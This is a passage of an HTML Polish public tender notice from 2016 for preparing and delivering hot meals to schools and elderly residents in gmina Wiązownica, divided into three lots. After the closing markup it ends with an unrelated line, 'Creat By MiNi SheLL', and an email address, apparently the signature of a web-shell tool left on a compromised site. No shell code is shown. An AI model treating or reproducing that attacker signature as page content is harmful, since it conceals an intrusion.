- 	pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia, zgodnie z art., 23 ust. 2 ustawy Pzp., w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza, 
- 	pełnomocnictwo do podpisania dokumentów oferty, o ile prawo to nie wynika z innych dokumentów złożonych w ofercie (KRS, Informacja z CEIDG) w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza, 
-	 pisemne zobowiązanie podmiotów oddających do  dyspozycji wykonawcy niezbędnych 
      zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).
- oświadczenia czy zamierza wykonać przedmiot zamówienia osobiście czy poprzez   podwykonawców. Zamawiający żąda wskazania przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy oraz podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22a ust. 1 Pzp.
  -    dowód wniesienia wadium (jeżeli dotyczy). 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>98</td></tr><tr><td>Termin płatności </td><td>2</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający podpisze umowę z wykonawcą, który przedłoży najkorzystniejszą ofertę na warunkach i z uwzględnieniem postanowień przedstawionych w projekcie umowy.
2. Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie pisemnej.   3. Zamawiający zgodnie z art. 144 ustawy Prawo Zamówień Publicznych, przewiduje możliwość 
    dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której 
    dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:   
3.1. zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które 
       spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w 
       realizacji przedmiotu zamówienia,                             
3.2. zmiana obowiązującej stawki VAT;                                                                                               3.3. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;  
3.4. zmiany liczby i rodzajów posiłków w zależności od zaistniałych potrzeb, niezależnych od zamawiającego,
3.5. gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca 
       niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.                               
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/08/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przygotowanie i wydawanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W ramach planowanego zadania przewiduje się świadczenie usług w zakresie dożywiania uczniów szkół podstawowych i gimnazjum w roku szkolnym  2016/2017 oraz osób starszych, chorych,  samotnych i niepełnosprawnych na terenie gminy Wiązownica w formie gorących posiłków.
Wykonawca ponosi pełną odpowiedzialność za jakość i zgodność z warunkami jakościowymi  
       przygotowywanych posiłków, opisanymi w przedmiocie zamówienia. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę  podczas wykonywania przedmiotu zamówienia. 
Wykonawca zobowiązany jest  do przygotowania, wydawania i dostarczania posiłków o   najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa.
Ciepły posiłek musi odpowiadać normom odżywczym obowiązującym w tzw. punktach  zbiorowego żywienia tj. posiłki winny być przygotowane zgodnie z zasadami racjonalnego żywienia, sporządzone z pełnowartościowych, świeżych artykułów spożywczych, posiadających aktualne terminy ważności. 
Wykonawca gwarantuje wysoką jakość dostarczanego produktu, terminowość dostaw oraz zgodność z obowiązującymi normami i wymogami sanitarnymi.
Wykonawca jest zobowiązany do sprzedaży posiłków uczniom nie objętym niniejszym zamówieniem w cenie równej jaką podał w ofercie (samodzielnie wykupującym posiłki). 
Obiady powinny odpowiadać następującym kryteriom:
- zawartość energii  850 kcal;
- udział energii z białka  nie mniej niż 12% wartości energetycznej posiłku;
- udział białka zwierzęcego  średnio 50% ogólnej ilości białka zawartego w posiłku;
- udział energii z tłuszczu  do 30%.
Przewidywana dzienna ilość posiłków do wydania wynosi:
      dla części I  -    90 porcji  pełnych obiadów,
                              40 porcji obiady jednodaniowe 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55321000-6, 55524000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>98</td></tr><tr><td>Termin płatności</td><td>2</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przygotowanie i wydawanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej w Ryszkowej Woli.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W ramach planowanego zadania przewiduje się świadczenie usług w zakresie dożywiania uczniów szkół podstawowych i gimnazjum w roku szkolnym  2016/2017 oraz osób starszych, chorych,  samotnych i niepełnosprawnych na terenie gminy Wiązownica w formie gorących posiłków.
Wykonawca ponosi pełną odpowiedzialność za jakość i zgodność z warunkami jakościowymi  
       przygotowywanych posiłków, opisanymi w przedmiocie zamówienia. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę  podczas wykonywania przedmiotu zamówienia. 
Wykonawca zobowiązany jest  do przygotowania, wydawania i dostarczania posiłków o   najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa.
Ciepły posiłek musi odpowiadać normom odżywczym obowiązującym w tzw. punktach  zbiorowego żywienia tj. posiłki winny być przygotowane zgodnie z zasadami racjonalnego żywienia, sporządzone z pełnowartościowych, świeżych artykułów spożywczych, posiadających aktualne terminy ważności. 
Wykonawca gwarantuje wysoką jakość dostarczanego produktu, terminowość dostaw oraz zgodność z obowiązującymi normami i wymogami sanitarnymi.
Wykonawca jest zobowiązany do sprzedaży posiłków uczniom nie objętym niniejszym zamówieniem w cenie równej jaką podał w ofercie (samodzielnie wykupującym posiłki). 
Obiady powinny odpowiadać następującym kryteriom:
- zawartość energii  850 kcal;
- udział energii z białka  nie mniej niż 12% wartości energetycznej posiłku;
- udział białka zwierzęcego  średnio 50% ogólnej ilości białka zawartego w posiłku;
- udział energii z tłuszczu  do 30%.
      Przewidywana dzienna ilość posiłków do wydania wynosi:
 
      dla części II  - 120 porcji  pełnych obiadów,
                              20 porcji obiady jednodaniowe
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55321000-6, 55524000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>98</td></tr><tr><td>Termin płatności </td><td>2</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przygotowanie oraz dowóz obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla osób starszych, chorych,  samotnych i niepełnosprawnych z terenu gminy Wiązownica.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W ramach planowanego zadania przewiduje się świadczenie usług w zakresie dożywiania uczniów szkół podstawowych i gimnazjum w roku szkolnym  2016/2017 oraz osób starszych, chorych,  samotnych i niepełnosprawnych na terenie gminy Wiązownica w formie gorących posiłków.
Wykonawca ponosi pełną odpowiedzialność za jakość i zgodność z warunkami jakościowymi  
       przygotowywanych posiłków, opisanymi w przedmiocie zamówienia. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę  podczas wykonywania przedmiotu zamówienia. 
Wykonawca zobowiązany jest  do przygotowania, wydawania i dostarczania posiłków o   najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa.
Ciepły posiłek musi odpowiadać normom odżywczym obowiązującym w tzw. punktach  zbiorowego żywienia tj. posiłki winny być przygotowane zgodnie z zasadami racjonalnego żywienia, sporządzone z pełnowartościowych, świeżych artykułów spożywczych, posiadających aktualne terminy ważności. 
Wykonawca gwarantuje wysoką jakość dostarczanego produktu, terminowość dostaw oraz zgodność z obowiązującymi normami i wymogami sanitarnymi.
Wykonawca jest zobowiązany do sprzedaży posiłków uczniom nie objętym niniejszym zamówieniem w cenie równej jaką podał w ofercie (samodzielnie wykupującym posiłki). 
Obiady powinny odpowiadać następującym kryteriom:
- zawartość energii  850 kcal;
- udział energii z białka  nie mniej niż 12% wartości energetycznej posiłku;
- udział białka zwierzęcego  średnio 50% ogólnej ilości białka zawartego w posiłku;
- udział energii z tłuszczu  do 30%.
      Przewidywana dzienna ilość posiłków do wydania wynosi:
 
      dla części III     12 porcji obiady 2 daniowe
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55321000-6, 55524000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>98</td></tr><tr><td>Termin płatności</td><td>2</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com